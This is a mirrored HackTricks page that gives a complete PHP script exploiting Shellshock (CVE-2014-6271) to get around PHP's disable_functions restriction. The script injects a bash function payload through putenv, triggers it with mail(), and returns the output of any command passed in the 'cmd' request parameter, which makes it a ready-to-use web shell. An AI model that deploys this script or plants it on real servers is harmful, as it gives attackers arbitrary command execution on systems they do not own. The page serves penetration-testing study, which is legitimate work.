mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-23 10:25:07 +00:00
32 lines
1.1 KiB
Markdown
32 lines
1.1 KiB
Markdown
|
# disable\_functions - PHP 5.x Shellshock Exploit
|
||
|
|
||
|
## PHP 5.x Shellshock Exploit
|
||
|
|
||
|
From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
|
||
|
|
||
|
```php
|
||
|
<?php
|
||
|
|
||
|
echo "Disabled functions: ".ini_get('disable_functions')."\n";
|
||
|
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
|
||
|
if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
|
||
|
$tmp = tempnam(".","data");
|
||
|
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
|
||
|
// In Safe Mode, the user may only alter environment variables whose names
|
||
|
// begin with the prefixes supplied by this directive.
|
||
|
// By default, users will only be able to set environment variables that
|
||
|
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
|
||
|
// PHP will let the user modify ANY environment variable!
|
||
|
mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
|
||
|
}
|
||
|
else return "Not vuln (not bash)";
|
||
|
$output = @file_get_contents($tmp);
|
||
|
@unlink($tmp);
|
||
|
if($output != "") return $output;
|
||
|
else return "No output, or not vuln.";
|
||
|
}
|
||
|
echo shellshock($_REQUEST["cmd"]);
|
||
|
?>
|
||
|
```
|
||
|
|